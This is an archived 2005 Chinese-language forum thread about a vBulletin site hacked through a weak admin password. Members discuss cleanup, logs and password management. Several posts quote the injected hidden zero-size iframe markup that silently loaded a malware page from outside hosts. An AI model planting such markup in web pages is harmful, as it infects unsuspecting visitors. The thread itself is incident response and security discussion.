查看完整版本 : [有木馬]哈啦大大...
vincentliao
2005-05-12, 10:33 PM
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>
steven
2005-05-12, 10:46 PM
這這這.....................
這麼快又中了......
ckmarkhsu
2005-05-12, 10:47 PM
恩 非常好.....看來真的不是phpBB的問題...
ckmarkhsu
2005-05-12, 10:50 PM
已經移除...
真是沒面子...
另外..對於之前批評phpBB安全性問題...向phpBB的支持者道歉Orz
謎之音: 絕對是使用者的問題.. 絕對是.... :)
licheng
2005-05-12, 11:10 PM
已經移除...
真是沒面子...
這怎麼會沒面子?
沒有絕對安全的論壇,也沒有絕對安全的作業系統。只有細心負責的系統維護者。
剛剛才看見有人反應,一回頭,已經移除了。
夠快。 ~yes
seesawgame
2005-05-12, 11:15 PM
這個東東會植入在xoops裡面嗎?
Ricado
2005-05-12, 11:16 PM
沒有絕對安全的論壇,也沒有絕對安全的作業系統。只有細心負責的系統維護者。
~youarebe:
網路線拔掉可能更安全,否則就要有隨時被攻擊的準備。
ckmarkhsu
2005-05-13, 12:53 AM
恩 我已經寫信給Acsite討論問題的可能性
剛剛再竹貓也有發現有人有相同問題 不過他是phpBB2.0.14
埃......
真是不好意思,我自己怎麼來來去去都沒有接到任何顯示警告呢?我現在是用卡巴斯基啊?
還好有徐同學ckmarkhsu的支援,不然我也不知該怎麼辦?
這些木馬到底是怎麼植入的?
ckmarkhsu
2005-05-13, 01:10 AM
真是不好意思,我自己怎麼來來去去都沒有接到任何顯示警告呢?我現在是用卡巴斯基啊?
還好有徐同學ckmarkhsu的支援,不然我也不知該怎麼辦?
這些木馬到底是怎麼植入的?
恩 我必須要很誠實的說...
我道維太淺...真的不知道是怎樣被植入的Orz
哈拉大大太客氣了
我沒把您的論壇搞好學弟真是羞愧阿Orz...
可不可以先裝 那個白色的 樣版阿.. ?:teeth
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>
請問您有在ie開啟網頁的原始檔嗎? 這串文字是放在那啊? ~what
哈拉兄,建議你將所有的ADMIN密碼全數更換,包含SQL的,然後找看看
有沒有跑其他的小程式。我換了VBB目前還沒中獎..@@
heybye
2005-05-13, 09:23 AM
我的BBS已经感染过4次了。
这应当是一个Upload漏洞,利用上传扩展名为.jpg的病毒文件进行感染。
licheng
2005-05-13, 02:45 PM
請問您有在ie開啟網頁的原始檔嗎? 這串文字是放在那啊? ~what
應該是已經移除掉了。
當初 vincentliao 發文的時候,我有看了一下網頁原始碼,是有那些東西。
當時的瀏覽器是 Mozilla Firefox 1.0.4 英文版。
ckmarkhsu
2005-05-13, 03:55 PM
應該是已經移除掉了。
當初 vincentliao 發文的時候,我有看了一下網頁原始碼,是有那些東西。
當時的瀏覽器是 Mozilla Firefox 1.0.4 英文版。
恩 我移除掉的
總不能依直放著吧~"~
kiang
2005-05-13, 04:08 PM
如果問題是出在同一台主機的其他帳號,那就真的沒輒了...
vincentliao
2005-05-13, 07:24 PM
講出來大家可能打死不相信.
小弟電腦單純到連[防毒]/[Office]/[FTP]這些軟體都沒有.
記得好久以前的幾位電腦師父
[劉X淦]/[涂x誠]
他們教小弟的一些方法如何當管理系統者.
小弟受益良多.
提出來大家當一下參考.
a.把環境處理到最簡單的狀況,這樣您才可以抓到最難的問題.
b.絕對不用電子方式留下系統者的帳號與密碼.這些只能用當面與電話告知.
c.當有異樣發生時,一定要查出來,不然以後會更複雜.
PS1.: 小弟是看ADSL的訊號禿然亂閃,到[cntl]+[Alt]+[Del]多了一個job.
才查到有[木馬] ...
PS2.: [2005-05-12,22:33] ==) [2005-05-12,22:50]這段時間在首頁的使用者,您的 IE 已經被攻擊了,有可能已經種[木馬]了...
vincentliao
2005-05-13, 07:38 PM
XP 預設就是用 IE.
自行線上掃一下毒了,因為小弟也中標了.
http://googol.name/index.php?showtopic=203
http://vbb3.twftp.org/showthread.php?t=5881
管理者不應該拿管理其他server的電腦來上網,尤其是四處亂逛甚至瘋狂下載的。
vincentliao
2005-05-13, 08:09 PM
小弟直話直說了...
Phpbb
Vbb
都被破了.
這真的是系統管理者的問題.
1.密碼給誰.如何給法.
2.電腦的管理方法.
3.系統管理者,不只是您的電腦資料重要,
而是其他使用者都該告知,請他們趕快改密碼.
choachukang
2005-05-13, 08:59 PM
bubble.com.tw
phpbb-tw.net
bbs.nova.com.tw
silon.loxa.edu.tw
antique.bubble.com.tw
都有被植入ganebase.com/temp/hinet.htm"
講出來大家可能打死不相信.
小弟電腦單純到連[防毒]/[Office]/[FTP]這些軟體都沒有哈,這兒就有一位同好啦。 :)
我這兒也是差不多。沒有防毒軟體,沒有 MS Office,系統預設的瀏覽器是 Mozilla Firefox,預設的電子郵件軟體是 Mozilla Mail。
作業系統是 Windows NT 4.0 workstation。安全防護方面,就是防火牆,以及良好的使用習慣。
前陣子 dx2 推薦一款掃木馬的軟體 Spybot,目前都保持最新的資料,也從未掃出過任何一個木馬。希望 Spybot 可以信賴。 :P
a.把環境處理到最簡單的狀況,這樣您才可以抓到最難的問題.
b.絕對不用電子方式留下系統者的帳號與密碼.這些只能用當面與電話告知.
c.當有異樣發生時,一定要查出來,不然以後會更複雜.正確。
剛剛才幫一位朋友架設一個網站,設定完成後,要將相關密碼告訴對方。我希望直接以電話告知•不過,我設的密碼,又臭又長。搞半天,對方堅持直接以電子郵件寄給他。
奈何。
choachukang
2005-05-13, 09:07 PM
<iframe src="http://gamania.go.zccn.net/x/hinet.htm
還有這個!
如果是目錄又被砍了, 換了 html 鐵定是主機商的問題..
但是這種 SQL 注入攻擊, 網路有教學文章..
直接用<FORM> 和 </FORM> 之間的變數就可以注入了
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
要怎麼防? 不知道是不是 php 版本的關係還是?
licheng
2005-05-13, 09:08 PM
咦?又變成訪客了? ~what
這次是放在網站名稱那欄,我已把它刪了。
請問這到底是如何做到的?而且就在剛才一分鐘內的事,因為之前我正在發文章,一發完就發現又出現了。我能立即找到人嗎?
如果可以的話請回報官方比較快~
什麼意思?誰是官方? ~what
原始的的sql 檔案沒辦法用一般編輯器讀取..
這是常見的 SQL Injection Walkthrough 的問題, 用表單直接注入到 SQL
所以回報 VBB 官方請提供修正檔可能是最快的方法...
也有可能是主機的問題 ( php版本等等.. )
哈拉大哥要不要把 快速回覆這個輸入表單關掉一段時間看看.
ckmarkhsu
2005-05-13, 09:39 PM
恩 我今晚就會到官方論壇去反應
另外ACSITE回我的信了 他說上一封信沒收到 他們正在檢查問題
晚點會給我答覆
硍 那個GB惹毛我了
我一定要找到問題根源一 一|||
不過我不解的是 為什麼網路上六十幾萬個VBB論壇 偏偏就我上的這幾個被INJECT@@
TWFTP好像還沒遭殃@@....
我自己的學生論壇還在用vB2.3也沒事情@@
哈拉要不要幫我寫英文反應意見阿@@
我英文寫作頗濫@@
ckmarkhsu
2005-05-13, 09:49 PM
另外有個問題 哈啦的密碼太簡單了...
我已經建議他改密碼.....
四位數的數字一 一|||
另外有個問題 哈啦的密碼太簡單了...
我已經建議他改密碼.....
四位數的數字一 一|||
~embarass: 我也是..
不過除了論壇以外都是13~15位的密碼 ~coolguy
ckmarkhsu
2005-05-13, 09:53 PM
是我電腦的問題嗎
為什麼竹貓連不上去?
licheng
2005-05-13, 09:58 PM
另外有個問題 哈啦的密碼太簡單了...
四位數的數字不會吧?
這... 太酷了。 :bow
我有一套密碼管理方式。
所有密碼都是亂數產生,字數從 12 到 20 個字元,都有可能。而且沒有兩個地方的密碼是相同的。 ~embarass:
真正重要的密碼,則是使用 GnuPG 加密。 ~coolguy
licheng
2005-05-13, 10:01 PM
為什麼竹貓連不上去?我也連不上。 :roll:
德不孤,必有鄰。 ?:teeth
teddychu
2005-05-13, 10:08 PM
不會吧?
這... 太酷了。 :bow
我有一套密碼管理方式。
所有密碼都是亂數產生,字數從 12 到 20 個字元,都有可能。而且沒有兩個地方的密碼是相同的。 ~embarass:
真正重要的密碼,則是使用 GnuPG 加密。 ~coolguy
可以跟您請教一下大致上是怎樣運作的嗎?
(這麼多密碼,這麼長,打起來不是很累?)
謝謝。 ~yes
不過我不解的是 為什麼網路上六十幾萬個VBB論壇 偏偏就我上的這幾個被INJECT@@
TWFTP好像還沒遭殃@@....
我自己的學生論壇還在用vB2.3也沒事情@@
哈拉要不要幫我寫英文反應意見阿@@
我英文寫作頗濫@@
會不會是常上本站的訪客幹的?所以感覺上會有一個相關的範圍?
你要表達什麼寫個中文,我看能否寫成英文?不然就麻煩DTC版友,他是在美國學電腦的,絕對沒問題 ?:teeth
licheng
2005-05-13, 10:32 PM
可以跟您請教一下大致上是怎樣運作的嗎?簡單講,就是以一個複雜但是自己記得住的密碼,管理其他所有的密碼。
自己只要記住那個唯一的複雜的密碼即可。其他的密碼,以該密碼保護。
密碼分門別類,儲存在不同的文字檔裡頭,然後以 RAR 壓縮。需要使用密碼的時候,開啟 WinRAR,調出需要的密碼,然後複製拷貝,就成了。
這種方式,不要說 20 個字元,64 個字元也沒問題。
不過,因為有些網站,最多只能輸入 20 個字元,所以,以 20 個字元為上限。
而這個單一密碼保護的檔案,當然是命根子。平時的備份,就很重要。
備份時,除了光碟備份,磁片備份,以及網路遠端備份之外,備份之前,還以 GnuPG 加密。GnuPG 的加密密碼,採用中文。算了一下,我的中文密碼,長達 28 個字元。
GnuPG 支援任意字碼,包括空白以及斷行字元。
細節當然還有地方要注意,但是,原則大致是如此。
ckmarkhsu
2005-05-14, 01:03 AM
我想我已經知道那個該死的人是怎麼稿的了:)
一切的問題 出自於哈啦的密碼太簡單了
他是直接從後台修改 植入iframe
根本不是什麼漏洞一 一|||
等等打LOG檔PO上來
我還需要一點時間分析:)
.......
謎之聲: 這一定是使用者的問題.. 一定是..
ckmarkhsu
2005-05-14, 01:25 AM
~"~
some老大
Apache的LOG紀錄的真的很清楚嗎@@
我沒有亂掰啦XD
那個機掰的人 他是用哈拉站長的帳號登入
他還會查詢管理紀錄喔@@
可惜 這論壇的管理紀錄是我才有權限刪除 哈哈
所以他的行為都被紀錄下來了一 一|||
~"~
some老大
Apache的LOG紀錄的真的很清楚嗎@@
我沒有亂掰啦XD
那個機掰的人 他是用哈拉站長的帳號登入
他還會查詢管理紀錄喔@@
可惜 這論壇的管理紀錄是我才有權限刪除 哈哈
所以他的行為都被紀錄下來了一 一|||
那麼說,這是有個特定的人針對這個論壇進入的嗎?那其他的論壇說有被駭的類似情形,也是他跑到那個論壇並且取得密碼後進入後台搞鬼的?而非先前猜的可能是利用機器人大量掃瞄所致?
還有,他怎麼會知道我在虛擬主機上的帳號名稱?
所以從訪客IP可以查知大概的方向?
是這樣嗎?
vincentliao
2005-05-14, 02:50 AM
哈拉大大,Ckmarkhsu大大,
請把資料收集好,可以找[刑事組]幫忙了.
ckmarkhsu
2005-05-14, 03:36 AM
分析結果:)
http://www.domain.club.tw/showthread.php?t=5852
我個人的保密措施太過馬虎而造成此次及過去的類似事件,實在十分抱歉。 ~embarass: :bow
請問是什麼的密碼 ~what
我們有一位用戶的ASP論壇在二月前也是有類似情況, 字串寫入論壇的分版敘述文字中,
也就是存入ACCESS資料庫中......
WIN和LINUX平台不一樣, PHP程式和ASP程式也不一樣, 資料庫類型也不一樣....
目前想到的, 就是在論壇上面能夠輸入資料的欄位輸入特定字串 :hitwall
ckmarkhsu
2005-05-14, 08:17 AM
就是帳號密碼阿@@....
那之前的PHPBB2被入侵, 也是一樣是密碼的原因嗎?
那不是很多論壇站長都太笨了
ckmarkhsu
2005-05-14, 08:41 AM
痾 我可沒有這麼說@@
我僅是針對此次問題分析LOG得到的結論
其他我還要看他們的LOG才能做判斷@@
vincentliao
2005-05-14, 01:48 PM
哈拉的損失應該還好,
而小弟以前的損失是用百萬計.
照log看,這次只是小朋友,還非正規的大陸駭客部隊.
辛苦了,由其是哈拉大大與Ckmarkhsu大大.
小弟謹致上十二萬分的祝福.
哈拉的損失應該還好,
而小弟以前的損失是用百萬計.
照log看,這次只是小朋友,還非正規的大陸駭客部隊.
辛苦了,由其是哈拉大大與Ckmarkhsu大大.
小弟謹致上十二萬分的祝福.
這還得感謝徐同學,我是吃飽閑閑,根本混然不覺 ~embarass:
whosee
2005-05-14, 02:00 PM
哈拉的損失應該還好,
而小弟以前的損失是用百萬計.
照log看,這次只是小朋友,還非正規的大陸駭客部隊.
辛苦了,由其是哈拉大大與Ckmarkhsu大大.
小弟謹致上十二萬分的祝福.
呵呵...
典型的受「政治」迫害...
應該要求國家賠償...
這還得感謝徐同學,我是吃飽閑閑,根本混然不覺 ~embarass:
還好不是哈拉的網路銀行帳號與密碼
不然 ~coolguy
vincentliao
2005-05-14, 06:20 PM
TWFTP.org 中木馬...
http://www.googol.name/open_doc/twftp/
這些人真無聊...
Jerry.L
2005-05-14, 06:25 PM
是被入侵了吧..
討論區標題先被改成
1.中国。台灣FTP聯盟 然後又被改成
2.不得不回来 接著又被改
3.ckmarkhsu,I'm back
vincentliao
2005-05-14, 06:30 PM
Yes
小弟的發言也被砍了...
還好有留影...
vincentliao
2005-05-14, 06:38 PM
入侵手法
Step1: 先進 Ckmarkhsu 的頭像植入木馬code
Step2: 再進首頁, 植入 木馬code
vincentliao
2005-05-14, 06:44 PM
可能今天選舉...
只要叫 _[台灣]_ 的論壇都招惹到大陸...
ckmarkhsu
2005-05-14, 10:50 PM
恩 我關閉了論壇大部分的進階功能
我想我可能招惹到他了
必要時我會消失...
希望不要造成兩個論壇的困擾
當然 我還是會繼續提供協助....
sorry
vincentliao
2005-05-15, 12:26 AM
1.作好您該做的事...
2.一個無法再吸收新知的廢人,多說無益...
3.乞丐趕廟公,天下沒有這種道理...
4.總統府的網頁還好好的... http://www.president.gov.tw/
5.美國白宮還在耶... http://whitehouse.gov
6.小弟網站還沒掛... http://googol.name
:)
monkey
2005-05-15, 12:11 PM
這幾天因為電腦耍脾氣..不給我用 >"<
沒想到這裡發生了 大 事 !
ckmarkhsu 辛苦了!
vincentliao
2005-05-15, 03:06 PM
這些_[蒙面人]_ 在玩[貓抓耗子遊戲]...
沒能力去破
總統府 http://www.president.gov.tw/
白宮 http://whitehouse.gov/
這些_[蒙面人]_ 只會在這邊耍猴戲...
版上大大只能在這邊猜...
良性建議半天...
方向都在繞圈子...
只有LOG會說話...
作好備份最重要...
大家能幫的有限...
最後哈啦要自己作判斷...
vincentliao
2005-05-16, 12:25 AM
辛苦了 Dx2大大.
不知道有哪為大大有分析過被植入的 Code 為何?
a. 只是要偷別人的密碼?
b. 當作DDOS的跳板...
還是有其他功能...
harry112
2005-05-16, 03:31 PM
簡單講,就是以一個複雜但是自己記得住的密碼,管理其他所有的密碼。
請問這隻程式的名稱是?
licheng
2005-05-16, 04:05 PM
請問這隻程式的名稱是?什麼程式都可以。只要可以壓縮,將帶有密碼的檔案集中管理,以及提供加密的功能,保護所有密碼檔,基本上,什麼程式都行。
我是使用 WinRAR。
不是說 WinRAR 最好,而是,它在方便性跟安全性之間,提供了一個平衡點。
我們要安全,也要某種程度的方便。不然,還沒防得了小人,先整死君子。 :that is :
真正要安全的話,我是建議通通使用 GnuPG。但是,GnuPG 在 Windows 的環境底下,使用不太方便。WinRAR 雖然安全性不若 GnuPG,但是,使用方便。而且普遍性不亞於 GnuPG,可以在 Windows, Linux, BSD 底下通用。
WinRAR 從 DOS 時代到現在,破解密碼除了暴力破解,還沒有其他捷徑。就個人使用的標準,算是安全。
而 WinZip 則要避免。WinZip 的密碼,太容易破解。幾乎不需要五六秒,再長的密碼,都可以輕易破解。雖然說新版的 WinZip 有改善,但是,WinZip 不良記錄太多了,少碰為妙。
這是平常使用。如果要備份到光碟、磁片,特別是遠端備份,為了安全起見,除了 WinRAR,最好還要以 GnuPG 加密。因為,檔案落入他人手中,就可以慢慢破解,什麼時候被破解掉了都不知道。
當然還有其他注意事項,譬如檔案隱藏什麼的,反正,務必小心。
ismile
2005-05-16, 11:39 PM
請問有什麼好用的 GnuPG 程式可在 Windows 下用嗎 ?
Jerry.L
2005-05-17, 07:33 AM
請問有什麼好用的 GnuPG 程式可在 Windows 下用嗎 ?
GnuPG 1.4.1
ftp://ftp.gnupg.org/gcrypt/binary/gnupg-w32cli-1.4.1.exe
licheng
2005-05-17, 07:38 AM
請問有什麼好用的 GnuPG 程式可在 Windows 下用嗎 ?好用的?嗯,看不太懂。
GnuPG 只有一種,在 Windows 底下的,也只有一種。
目前最新版是 1.4.1。
http://www.gnupg.org/
GnuPG 的操作方式是指令模式,沒有 GUI。當然,有人開發搭配 GnuPG 的 GUI 程式,不過,我沒用過。我還是習慣指令模式的操作。
相關的資料或資源,在 GnuPG 網站都可以找到。
Jerry.L
2005-05-17, 07:46 AM
GnuPG 只有一種,在 Windows 底下的,也只有一種。
不只一種吧?!
GnuPG 有多版本,包含 Windows、DOS、Linux....
licheng
2005-05-17, 09:30 AM
哈,沒想到引起這樣的誤解。 ~greenlau:
我的意思是,GnuPG 只有一種樣子﹝look and feel﹞,不像 RAR,有 command line 的,也有 GUI 的。
除了 Windows 之外,GnuPG 我都是自己編譯的。因為都是同一個原始程式碼編譯,在我眼中,他們自然都是屬於同一種了。 ~greenlau:
也在 cygwin 環境底下,以及使用 Mingw32 編譯 GnuPG。是可以執行啦,不過,有些功能在 Windows 底下沒作用,編譯時需要注意的地方蠻多的,不如直接抓 Windows 版編譯好的執行檔。
話又說回來,這一次是運氣好,GnuPG 1.4.1 有編譯好的 Windows 執行檔。前幾個版本,GnuPG 網站只教人怎麼編譯,不提供執行檔下載。
真在乎安全隱私,需要依賴 GnuPG,要嘛換跑道,改用 Linux/BSD,要嘛設法學習怎麼自行編譯 GnuPG。或許 GnuPG 1.4.2,又要自力救濟了,也說不定。
不然就改用 PGP。
我從 PGP 2.6.2 開始使用 PGP。那是 DOS 時代的事。用到 PGP 6.5.8,之後,改用 GnuPG。還是 GnuPG 比較好。不過,在 Windows 環境的介面上,PGP 要好很多。有興趣的,也可以考慮 PGP。只是,我離開 PGP 太久了,不清楚它的現狀。
辛苦了 Dx2大大.
不知道有哪為大大有分析過被植入的 Code 為何?
a. 只是要偷別人的密碼?
b. 當作DDOS的跳板...
還是有其他功能...
V大,您錯愛了,我只出嘴巴而已。
被執入的code可能要找當事人才能看有沒有不小心留下來。
vBulletin® v3.8.4,版權所有 ©2000-2024,Jelsoft Enterprises Ltd.